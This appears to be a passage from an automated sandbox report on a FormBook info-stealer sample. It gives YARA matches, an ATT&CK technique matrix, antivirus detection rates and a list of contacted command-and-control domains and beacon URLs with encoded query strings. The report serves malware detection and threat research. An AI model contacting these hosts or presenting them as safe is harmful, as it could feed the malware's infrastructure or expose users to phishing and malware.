Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Queries volume information: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\cmstp.exe

Code function: 13_2_003D1945 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

13_2_003D1945

Source: C:\Windows\SysWOW64\cmstp.exe

Code function: 13_2_003CF80E GetSystemInfo,GetVersionExW,

13_2_003CF80E

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	612 Process Injection	11 Disable or Modify Tools	LSASS Memory	331 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	Logon Script (Windows)	1 Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Abuse Elevation Control Mechanism	1 Access Token Manipulation	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 DLL Side-Loading	612 Process Injection	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Abuse Elevation Control Mechanism	DCSync	215 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	3 Obfuscated Files or Information	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CZyOWoN2hiszA6d.exe	21%	ReversingLabs	Win32.Backdoor.FormBook
CZyOWoN2hiszA6d.exe	38%	Virustotal		Browse
CZyOWoN2hiszA6d.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	21%	ReversingLabs	Win32.Backdoor.FormBook

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.agenkilat-official.space	0%	Virustotal	Browse
mirotcg.info	0%	Virustotal	Browse
www.wshifen.com	0%	Virustotal	Browse
dnwgt80508yoec8pzq.top	1%	Virustotal	Browse
www.kapalwin.live	0%	Virustotal	Browse
visualvarta.com	1%	Virustotal	Browse
shops.myshopify.com	0%	Virustotal	Browse
www.mpo525.monster	0%	Virustotal	Browse
hatesa.xyz	1%	Virustotal	Browse
www.dnwgt80508yoec8pzq.top	3%	Virustotal	Browse
www.hatesa.xyz	0%	Virustotal	Browse
www.nijssenadventures.com	0%	Virustotal	Browse
www.go4stores.com	0%	Virustotal	Browse
www.turbo3club.site	2%	Virustotal	Browse
www.mirotcg.info	0%	Virustotal	Browse
www.vicmvm649n.top	1%	Virustotal	Browse
turbo3club.site	6%	Virustotal	Browse
www.dyahwoahjuk.store	2%	Virustotal	Browse
www.visualvarta.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
http://www.hatesa.xyzReferer:	0%	Avira URL Cloud	safe
http://www.go4stores.comReferer:	0%	Avira URL Cloud	safe
http://www.culturamosaica.com	0%	Avira URL Cloud	safe
http://www.mpo525.monster	0%	Avira URL Cloud	safe
https://word.office.comon	0%	Avira URL Cloud	safe
http://www.merrycleanteam.com/v15n/www.kurainu.xyz	0%	Avira URL Cloud	safe
http://www.gtur.topReferer:	0%	Avira URL Cloud	safe
http://www.nijssenadventures.com/v15n/	0%	Avira URL Cloud	safe
http://www.kurainu.xyzReferer:	0%	Avira URL Cloud	safe
www.gtur.top/v15n/	0%	Avira URL Cloud	safe
http://www.kapalwin.live	0%	Avira URL Cloud	safe
http://www.nijssenadventures.comReferer:	0%	Avira URL Cloud	safe
http://www.agenkilat-official.space/v15n/	0%	Avira URL Cloud	safe
http://www.gtur.top/v15n/S	0%	Avira URL Cloud	safe
http://www.dyahwoahjuk.store	100%	Avira URL Cloud	phishing
http://www.culturamosaica.comReferer:	0%	Avira URL Cloud	safe
http://www.turbo3club.site/v15n/www.agenkilat-official.space	0%	Avira URL Cloud	safe
http://www.agenkilat-official.space/v15n/www.visualvarta.com	0%	Avira URL Cloud	safe
http://www.culturamosaica.com/v15n/www.gtur.top	0%	Avira URL Cloud	safe
http://www.kapalwin.live/v15n/	0%	Avira URL Cloud	safe
http://www.visualvarta.com	0%	Avira URL Cloud	safe
http://www.merrycleanteam.com	0%	Avira URL Cloud	safe
http://www.dnwgt80508yoec8pzq.top/v15n/www.kapalwin.live	100%	Avira URL Cloud	malware
http://www.mpo525.monster/v15n/?Yn=AGM8cYat7abGFPmKwezZqVwW1aBQQM3PRq0t0OO3Vqk/+tNsWTohgGYaGZGPsfo13B1a&mv=Y4QppplhSjwxWBd	0%	Avira URL Cloud	safe
http://www.go4stores.com/v15n/www.hatesa.xyz	0%	Avira URL Cloud	safe
http://www.mpo525.monster/v15n/	0%	Avira URL Cloud	safe
http://www.kurainu.xyz	100%	Avira URL Cloud	malware
http://www.mirotcg.infoReferer:	0%	Avira URL Cloud	safe
http://www.dnwgt80508yoec8pzq.top	0%	Avira URL Cloud	safe
http://www.dyahwoahjuk.store/v15n/	100%	Avira URL Cloud	phishing
http://www.mpo525.monsterReferer:	0%	Avira URL Cloud	safe
http://www.dnwgt80508yoec8pzq.top/v15n/?Yn=pafJh4lutq9sQhYUfomZg+metsJ7WiBQxMAtxV3erKtPIYzS0c99vEziQ+Pcc2PtKrq6&mv=Y4QppplhSjwxWBd	100%	Avira URL Cloud	malware
http://www.vicmvm649n.top	0%	Avira URL Cloud	safe
http://www.nijssenadventures.com	0%	Avira URL Cloud	safe
http://www.go4stores.com	0%	Avira URL Cloud	safe
http://www.visualvarta.com/v15n/	0%	Avira URL Cloud	safe
https://wns.windows.com/)s	0%	Avira URL Cloud	safe
http://www.turbo3club.siteReferer:	0%	Avira URL Cloud	safe
http://www.dyahwoahjuk.storeReferer:	0%	Avira URL Cloud	safe
http://www.dnwgt80508yoec8pzq.topReferer:	0%	Avira URL Cloud	safe
http://www.kapalwin.liveReferer:	0%	Avira URL Cloud	safe
http://www.visualvarta.comReferer:	0%	Avira URL Cloud	safe
http://www.mpo525.monster/v15n/www.vicmvm649n.top	0%	Avira URL Cloud	safe
http://www.agenkilat-official.spaceReferer:	0%	Avira URL Cloud	safe
http://www.go4stores.com/v15n/?Yn=TZ7dEV+dePhm1jul6DRI/086qPMy6e3XQqPVR8kv79G9dLkwb8ABVO+elO8aT8i2Z4Zj&mv=Y4QppplhSjwxWBd	0%	Avira URL Cloud	safe
http://www.turbo3club.site/v15n/	0%	Avira URL Cloud	safe
http://www.vicmvm649n.topReferer:	0%	Avira URL Cloud	safe
http://www.turbo3club.site	0%	Avira URL Cloud	safe
http://www.visualvarta.com/v15n/www.nijssenadventures.com	0%	Avira URL Cloud	safe
http://www.merrycleanteam.com/v15n/	0%	Avira URL Cloud	safe
http://www.nijssenadventures.com/v15n/www.dnwgt80508yoec8pzq.top	0%	Avira URL Cloud	safe
http://www.mirotcg.info/v15n/www.dyahwoahjuk.store	0%	Avira URL Cloud	safe
http://www.mirotcg.info/v15n/	0%	Avira URL Cloud	safe
http://www.vicmvm649n.top/v15n/	100%	Avira URL Cloud	malware
http://www.mirotcg.info	0%	Avira URL Cloud	safe
http://www.kurainu.xyz/v15n/www.culturamosaica.com	100%	Avira URL Cloud	malware
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
http://www.gtur.top	0%	Avira URL Cloud	safe
http://www.hatesa.xyz/v15n/?Yn=l6h8+VCDejd8UaCGuBR/7TFLPGuM6ZnUcFM6cLRiUyTDZ3KSnL9/KZomame6k6rf6Ttt&mv=Y4QppplhSjwxWBd	0%	Avira URL Cloud	safe
http://www.culturamosaica.com/v15n/	0%	Avira URL Cloud	safe
http://www.dyahwoahjuk.store/v15n/www.mpo525.monster	100%	Avira URL Cloud	phishing
http://www.vicmvm649n.top/v15n/www.go4stores.com	100%	Avira URL Cloud	malware
http://www.hatesa.xyz/v15n/	0%	Avira URL Cloud	safe
http://www.agenkilat-official.space	0%	Avira URL Cloud	safe
http://www.hatesa.xyz	0%	Avira URL Cloud	safe
http://www.vicmvm649n.top/v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd	100%	Avira URL Cloud	malware
http://www.merrycleanteam.comReferer:	0%	Avira URL Cloud	safe
http://www.hatesa.xyz/v15n/www.turbo3club.site	0%	Avira URL Cloud	safe
http://www.kapalwin.live/v15n/www.merrycleanteam.com	0%	Avira URL Cloud	safe
http://www.gtur.top/v15n/	0%	Avira URL Cloud	safe
http://www.go4stores.com/v15n/	0%	Avira URL Cloud	safe
http://www.dnwgt80508yoec8pzq.top/v15n/	100%	Avira URL Cloud	malware
http://www.mirotcg.info/v15n/?Yn=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXQXM/YhbITnk&mv=Y4QppplhSjwxWBd	0%	Avira URL Cloud	safe
http://www.kurainu.xyz/v15n/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.agenkilat-official.space	188.114.96.3	true	false	0%, Virustotal, Browse	unknown
mirotcg.info	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
www.wshifen.com	103.235.47.188	true	false	0%, Virustotal, Browse	unknown
dnwgt80508yoec8pzq.top	3.33.130.190	true	true	1%, Virustotal, Browse	unknown
www.kapalwin.live	188.114.97.3	true	false	0%, Virustotal, Browse	unknown
visualvarta.com	89.117.188.72	true	true	1%, Virustotal, Browse	unknown
shops.myshopify.com	23.227.38.74	true	false	0%, Virustotal, Browse	unknown
turbo3club.site	107.180.116.42	true	true	6%, Virustotal, Browse	unknown
www.mpo525.monster	158.69.95.141	true	false	0%, Virustotal, Browse	unknown
hatesa.xyz	3.33.130.190	true	true	1%, Virustotal, Browse	unknown
www.vicmvm649n.top	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.dnwgt80508yoec8pzq.top	unknown	unknown	true	3%, Virustotal, Browse	unknown
www.hatesa.xyz	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.turbo3club.site	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.go4stores.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.dyahwoahjuk.store	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.nijssenadventures.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.mirotcg.info	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.visualvarta.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.gtur.top/v15n/	true	Avira URL Cloud: safe	unknown
http://www.mpo525.monster/v15n/?Yn=AGM8cYat7abGFPmKwezZqVwW1aBQQM3PRq0t0OO3Vqk/+tNsWTohgGYaGZGPsfo13B1a&mv=Y4QppplhSjwxWBd	false	Avira URL Cloud: safe	unknown
http://www.dnwgt80508yoec8pzq.top/v15n/?Yn=pafJh4lutq9sQhYUfomZg+metsJ7WiBQxMAtxV3erKtPIYzS0c99vEziQ+Pcc2PtKrq6&mv=Y4QppplhSjwxWBd	true	Avira URL Cloud: malware	unknown
http://www.go4stores.com/v15n/?Yn=TZ7dEV+dePhm1jul6DRI/086qPMy6e3XQqPVR8kv79G9dLkwb8ABVO+elO8aT8i2Z4Zj&mv=Y4QppplhSjwxWBd	false	Avira URL Cloud: safe	unknown
http://www.hatesa.xyz/v15n/?Yn=l6h8+VCDejd8UaCGuBR/7TFLPGuM6ZnUcFM6cLRiUyTDZ3KSnL9/KZomame6k6rf6Ttt&mv=Y4QppplhSjwxWBd	true	Avira URL Cloud: safe	unknown
http://www.vicmvm649n.top/v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd	false	Avira URL Cloud: malware	unknown
http://www.mirotcg.info/v15n/?Yn=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXQXM/YhbITnk&mv=Y4QppplhSjwxWBd	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.culturamosaica.com	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.comon	explorer.exe, 0000000A.00000000.2074669355.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483326842.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hatesa.xyzReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.go4stores.comReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mpo525.monster	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.merrycleanteam.com/v15n/www.kurainu.xyz	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gtur.topReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nijssenadventures.com/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 0000000A.00000000.2078451018.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4486803346.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.kurainu.xyzReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kapalwin.live	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nijssenadventures.comReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.agenkilat-official.space/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gtur.top/v15n/S	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dyahwoahjuk.store	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.culturamosaica.comReferer:	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.turbo3club.site/v15n/www.agenkilat-official.space	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.agenkilat-official.space/v15n/www.visualvarta.com	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.culturamosaica.com/v15n/www.gtur.top	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 0000000A.00000002.4484431911.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094644679.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3102587400.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.kapalwin.live/v15n/	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.visualvarta.com	explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
